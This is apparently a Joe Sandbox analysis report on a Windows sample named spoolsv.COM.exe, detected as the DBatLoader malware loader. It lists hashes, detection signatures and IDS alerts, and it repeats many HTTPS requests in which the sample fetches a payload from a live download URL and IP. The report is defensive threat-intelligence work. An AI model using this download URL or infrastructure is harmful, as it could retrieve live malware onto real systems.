Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
spoolsv.COM.exe

Overview

General Information

Sample name:spoolsv.COM.exe
Analysis ID:1579692
MD5:dfd15a4158ab979660435d6f3e95a3ec
SHA1:6d5566cddfb4b99e82a6babdbd4536a24e8f6f73
SHA256:baa12b649fddd77ef62ecd2b3169fab9bb5fbe78404175485f9a7fb48dc4456d
Tags:exeuser-xme
Infos:

Detection

DBatLoader
Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected DBatLoader
AI detected suspicious sample
Allocates many large memory junks
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query locales information (e.g. system language)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • spoolsv.COM.exe (PID: 7596 cmdline: "C:\Users\user\Desktop\spoolsv.COM.exe" MD5: DFD15A4158AB979660435D6F3E95A3EC)
  • cleanup
{"Download Url": ["https://swamfoxinnc.com/233_Svcrhpjadgy"]}
SourceRuleDescriptionAuthorStrings
00000005.00000002.2514939063.0000000002286000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
    00000005.00000003.1272909901.000000007FBB0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
      00000005.00000002.2531784448.000000007FC80000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
        SourceRuleDescriptionAuthorStrings
        5.2.spoolsv.COM.exe.2b20000.1.unpackJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
          No Sigma rule has matched
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-12-23T07:37:40.359466+010020283713Unknown Traffic192.168.2.1049701176.123.5.143443TCP
          2024-12-23T07:37:43.690393+010020283713Unknown Traffic192.168.2.1049704176.123.5.143443TCP
          2024-12-23T07:37:47.061424+010020283713Unknown Traffic192.168.2.1049711176.123.5.143443TCP
          2024-12-23T07:37:50.554677+010020283713Unknown Traffic192.168.2.1049723176.123.5.143443TCP
          2024-12-23T07:37:54.406026+010020283713Unknown Traffic192.168.2.1049735176.123.5.143443TCP
          2024-12-23T07:37:57.893612+010020283713Unknown Traffic192.168.2.1049744176.123.5.143443TCP
          2024-12-23T07:38:01.333205+010020283713Unknown Traffic192.168.2.1049756176.123.5.143443TCP
          2024-12-23T07:38:04.743917+010020283713Unknown Traffic192.168.2.1049763176.123.5.143443TCP
          2024-12-23T07:38:08.112094+010020283713Unknown Traffic192.168.2.1049775176.123.5.143443TCP
          2024-12-23T07:38:11.485345+010020283713Unknown Traffic192.168.2.1049786176.123.5.143443TCP
          2024-12-23T07:38:14.889619+010020283713Unknown Traffic192.168.2.1049794176.123.5.143443TCP
          2024-12-23T07:38:18.261307+010020283713Unknown Traffic192.168.2.1049805176.123.5.143443TCP
          2024-12-23T07:38:21.649788+010020283713Unknown Traffic192.168.2.1049813176.123.5.143443TCP
          2024-12-23T07:38:25.149958+010020283713Unknown Traffic192.168.2.1049825176.123.5.143443TCP
          2024-12-23T07:38:28.698981+010020283713Unknown Traffic192.168.2.1049833176.123.5.143443TCP
          2024-12-23T07:38:32.191400+010020283713Unknown Traffic192.168.2.1049844176.123.5.143443TCP
          2024-12-23T07:38:35.587388+010020283713Unknown Traffic192.168.2.1049855176.123.5.143443TCP
          2024-12-23T07:38:38.998362+010020283713Unknown Traffic192.168.2.1049864176.123.5.143443TCP
          2024-12-23T07:38:42.500005+010020283713Unknown Traffic192.168.2.1049875176.123.5.143443TCP
          2024-12-23T07:38:46.128701+010020283713Unknown Traffic192.168.2.1049883176.123.5.143443TCP
          2024-12-23T07:38:49.522196+010020283713Unknown Traffic192.168.2.1049894176.123.5.143443TCP
          2024-12-23T07:38:52.969121+010020283713Unknown Traffic192.168.2.1049904176.123.5.143443TCP
          2024-12-23T07:38:56.370320+010020283713Unknown Traffic192.168.2.1049913176.123.5.143443TCP
          2024-12-23T07:38:59.775032+010020283713Unknown Traffic192.168.2.1049924176.123.5.143443TCP
          2024-12-23T07:39:03.297310+010020283713Unknown Traffic192.168.2.1049932176.123.5.143443TCP
          2024-12-23T07:39:06.717185+010020283713Unknown Traffic192.168.2.1049944176.123.5.143443TCP
          2024-12-23T07:39:10.119202+010020283713Unknown Traffic192.168.2.1049951176.123.5.143443TCP
          2024-12-23T07:39:13.652984+010020283713Unknown Traffic192.168.2.1049963176.123.5.143443TCP
          2024-12-23T07:39:17.179009+010020283713Unknown Traffic192.168.2.1049973176.123.5.143443TCP
          2024-12-23T07:39:20.613727+010020283713Unknown Traffic192.168.2.1049982176.123.5.143443TCP
          2024-12-23T07:39:24.058034+010020283713Unknown Traffic192.168.2.1049994176.123.5.143443TCP
          2024-12-23T07:39:27.700295+010020283713Unknown Traffic192.168.2.1050001176.123.5.143443TCP
          2024-12-23T07:39:31.110620+010020283713Unknown Traffic192.168.2.1050012176.123.5.143443TCP
          2024-12-23T07:39:34.510112+010020283713Unknown Traffic192.168.2.1050023176.123.5.143443TCP
          2024-12-23T07:39:38.189131+010020283713Unknown Traffic192.168.2.1050031176.123.5.143443TCP
          2024-12-23T07:39:41.818166+010020283713Unknown Traffic192.168.2.1050042176.123.5.143443TCP

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: spoolsv.COM.exeAvira: detected
          Source: spoolsv.COM.exeMalware Configuration Extractor: DBatLoader {"Download Url": ["https://swamfoxinnc.com/233_Svcrhpjadgy"]}
          Source: spoolsv.COM.exeVirustotal: Detection: 74%Perma Link
          Source: spoolsv.COM.exeReversingLabs: Detection: 63%
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
          Source: spoolsv.COM.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
          Source: unknownHTTPS traffic detected: 176.123.5.143:443 -> 192.168.2.10:49701 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 176.123.5.143:443 -> 192.168.2.10:49704 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 176.123.5.143:443 -> 192.168.2.10:49711 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 176.123.5.143:443 -> 192.168.2.10:49723 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 176.123.5.143:443 -> 192.168.2.10:49735 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 176.123.5.143:443 -> 192.168.2.10:49744 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 176.123.5.143:443 -> 192.168.2.10:49756 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 176.123.5.143:443 -> 192.168.2.10:49763 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 176.123.5.143:443 -> 192.168.2.10:49775 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 176.123.5.143:443 -> 192.168.2.10:49786 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 176.123.5.143:443 -> 192.168.2.10:49794 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 176.123.5.143:443 -> 192.168.2.10:49805 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 176.123.5.143:443 -> 192.168.2.10:49813 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 176.123.5.143:443 -> 192.168.2.10:49825 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 176.123.5.143:443 -> 192.168.2.10:49833 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 176.123.5.143:443 -> 192.168.2.10:49844 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 176.123.5.143:443 -> 192.168.2.10:49855 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 176.123.5.143:443 -> 192.168.2.10:49864 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 176.123.5.143:443 -> 192.168.2.10:49875 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 176.123.5.143:443 -> 192.168.2.10:49883 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 176.123.5.143:443 -> 192.168.2.10:49894 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 176.123.5.143:443 -> 192.168.2.10:49904 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 176.123.5.143:443 -> 192.168.2.10:49913 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 176.123.5.143:443 -> 192.168.2.10:49924 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 176.123.5.143:443 -> 192.168.2.10:49932 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 176.123.5.143:443 -> 192.168.2.10:49944 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 176.123.5.143:443 -> 192.168.2.10:49951 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 176.123.5.143:443 -> 192.168.2.10:49963 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 176.123.5.143:443 -> 192.168.2.10:49973 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 176.123.5.143:443 -> 192.168.2.10:49982 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 176.123.5.143:443 -> 192.168.2.10:49994 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 176.123.5.143:443 -> 192.168.2.10:50001 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 176.123.5.143:443 -> 192.168.2.10:50012 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 176.123.5.143:443 -> 192.168.2.10:50023 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 176.123.5.143:443 -> 192.168.2.10:50031 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 176.123.5.143:443 -> 192.168.2.10:50042 version: TLS 1.2
          Source: C:\Users\user\Desktop\spoolsv.COM.exeCode function: 5_2_02B258B4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,5_2_02B258B4

          Networking

          barindex
          Source: Malware configuration extractorURLs: https://swamfoxinnc.com/233_Svcrhpjadgy
          Source: C:\Users\user\Desktop\spoolsv.COM.exeCode function: 5_2_02B3E2F8 InternetCheckConnectionA,5_2_02B3E2F8
          Source: Joe Sandbox ViewASN Name: ALEXHOSTMD ALEXHOSTMD
          Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49704 -> 176.123.5.143:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49711 -> 176.123.5.143:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49701 -> 176.123.5.143:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49775 -> 176.123.5.143:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49744 -> 176.123.5.143:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49813 -> 176.123.5.143:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49723 -> 176.123.5.143:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49756 -> 176.123.5.143:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49786 -> 176.123.5.143:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49825 -> 176.123.5.143:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49844 -> 176.123.5.143:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49735 -> 176.123.5.143:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49875 -> 176.123.5.143:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49864 -> 176.123.5.143:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49763 -> 176.123.5.143:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49855 -> 176.123.5.143:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49883 -> 176.123.5.143:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49894 -> 176.123.5.143:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49944 -> 176.123.5.143:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49904 -> 176.123.5.143:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49951 -> 176.123.5.143:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49963 -> 176.123.5.143:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49794 -> 176.123.5.143:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49924 -> 176.123.5.143:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:50023 -> 176.123.5.143:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49805 -> 176.123.5.143:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49973 -> 176.123.5.143:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:50012 -> 176.123.5.143:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49913 -> 176.123.5.143:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49932 -> 176.123.5.143:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49982 -> 176.123.5.143:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:50042 -> 176.123.5.143:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49994 -> 176.123.5.143:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:50001 -> 176.123.5.143:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:50031 -> 176.123.5.143:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49833 -> 176.123.5.143:443
          Source: global trafficHTTP traffic detected: GET /233_Svcrhpjadgy HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: swamfoxinnc.com
          Source: global trafficHTTP traffic detected: GET /233_Svcrhpjadgy HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: swamfoxinnc.com
          Source: global trafficHTTP traffic detected: GET /233_Svcrhpjadgy HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: swamfoxinnc.com
          Source: global trafficHTTP traffic detected: GET /233_Svcrhpjadgy HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: swamfoxinnc.com
          Source: global trafficHTTP traffic detected: GET /233_Svcrhpjadgy HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: swamfoxinnc.com
          Source: global trafficHTTP traffic detected: GET /233_Svcrhpjadgy HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: swamfoxinnc.com
          Source: global trafficHTTP traffic detected: GET /233_Svcrhpjadgy HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: swamfoxinnc.com
          Source: global trafficHTTP traffic detected: GET /233_Svcrhpjadgy HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: swamfoxinnc.com
          Source: global trafficHTTP traffic detected: GET /233_Svcrhpjadgy HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: swamfoxinnc.com
          Source: global trafficHTTP traffic detected: GET /233_Svcrhpjadgy HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: swamfoxinnc.com
          Source: global trafficHTTP traffic detected: GET /233_Svcrhpjadgy HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: swamfoxinnc.com
          Source: global trafficHTTP traffic detected: GET /233_Svcrhpjadgy HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: swamfoxinnc.com
          Source: global trafficHTTP traffic detected: GET /233_Svcrhpjadgy HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: swamfoxinnc.com
          Source: global trafficHTTP traffic detected: GET /233_Svcrhpjadgy HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: swamfoxinnc.com
          Source: global trafficHTTP traffic detected: GET /233_Svcrhpjadgy HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: swamfoxinnc.com
          Source: global trafficHTTP traffic detected: GET /233_Svcrhpjadgy HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: swamfoxinnc.com
          Source: global trafficHTTP traffic detected: GET /233_Svcrhpjadgy HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: swamfoxinnc.com
          Source: global trafficHTTP traffic detected: GET /233_Svcrhpjadgy HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: swamfoxinnc.com
          Source: global trafficHTTP traffic detected: GET /233_Svcrhpjadgy HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: swamfoxinnc.com
          Source: global trafficHTTP traffic detected: GET /233_Svcrhpjadgy HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: swamfoxinnc.com
          Source: global trafficHTTP traffic detected: GET /233_Svcrhpjadgy HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: swamfoxinnc.com
          Source: global trafficHTTP traffic detected: GET /233_Svcrhpjadgy HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: swamfoxinnc.com
          Source: global trafficHTTP traffic detected: GET /233_Svcrhpjadgy HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: swamfoxinnc.com
          Source: global trafficHTTP traffic detected: GET /233_Svcrhpjadgy HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: swamfoxinnc.com
          Source: global trafficHTTP traffic detected: GET /233_Svcrhpjadgy HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: swamfoxinnc.com
          Source: global trafficHTTP traffic detected: GET /233_Svcrhpjadgy HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: swamfoxinnc.com
          Source: global trafficHTTP traffic detected: GET /233_Svcrhpjadgy HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: swamfoxinnc.com
          Source: global trafficHTTP traffic detected: GET /233_Svcrhpjadgy HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: swamfoxinnc.com
          Source: global trafficHTTP traffic detected: GET /233_Svcrhpjadgy HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: swamfoxinnc.com
          Source: global trafficHTTP traffic detected: GET /233_Svcrhpjadgy HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: swamfoxinnc.com
          Source: global trafficHTTP traffic detected: GET /233_Svcrhpjadgy HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: swamfoxinnc.com
          Source: global trafficHTTP traffic detected: GET /233_Svcrhpjadgy HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: swamfoxinnc.com
          Source: global trafficHTTP traffic detected: GET /233_Svcrhpjadgy HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: swamfoxinnc.com
          Source: global trafficHTTP traffic detected: GET /233_Svcrhpjadgy HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: swamfoxinnc.com
          Source: global trafficHTTP traffic detected: GET /233_Svcrhpjadgy HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: swamfoxinnc.com
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: GET /233_Svcrhpjadgy HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: swamfoxinnc.com
          Source: global trafficHTTP traffic detected: GET /233_Svcrhpjadgy HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: swamfoxinnc.com
          Source: global trafficHTTP traffic detected: GET /233_Svcrhpjadgy HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: swamfoxinnc.com
          Source: global trafficHTTP traffic detected: GET /233_Svcrhpjadgy HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: swamfoxinnc.com
          Source: global trafficHTTP traffic detected: GET /233_Svcrhpjadgy HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: swamfoxinnc.com
          Source: global trafficHTTP traffic detected: GET /233_Svcrhpjadgy HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: swamfoxinnc.com
          Source: global trafficHTTP traffic detected: GET /233_Svcrhpjadgy HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: swamfoxinnc.com
          Source: global trafficHTTP traffic detected: GET /233_Svcrhpjadgy HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: swamfoxinnc.com
          Source: global trafficHTTP traffic detected: GET /233_Svcrhpjadgy HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: swamfoxinnc.com
          Source: global trafficHTTP traffic detected: GET /233_Svcrhpjadgy HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: swamfoxinnc.com
          Source: global trafficHTTP traffic detected: GET /233_Svcrhpjadgy HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: swamfoxinnc.com
          Source: global trafficHTTP traffic detected: GET /233_Svcrhpjadgy HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: swamfoxinnc.com
          Source: global trafficHTTP traffic detected: GET /233_Svcrhpjadgy HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: swamfoxinnc.com
          Source: global trafficHTTP traffic detected: GET /233_Svcrhpjadgy HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: swamfoxinnc.com
          Source: global trafficHTTP traffic detected: GET /233_Svcrhpjadgy HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: swamfoxinnc.com
          Source: global trafficHTTP traffic detected: GET /233_Svcrhpjadgy HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: swamfoxinnc.com
          Source: global trafficHTTP traffic detected: GET /233_Svcrhpjadgy HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: swamfoxinnc.com
          Source: global trafficHTTP traffic detected: GET /233_Svcrhpjadgy HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: swamfoxinnc.com
          Source: global trafficHTTP traffic detected: GET /233_Svcrhpjadgy HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: swamfoxinnc.com
          Source: global trafficHTTP traffic detected: GET /233_Svcrhpjadgy HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: swamfoxinnc.com
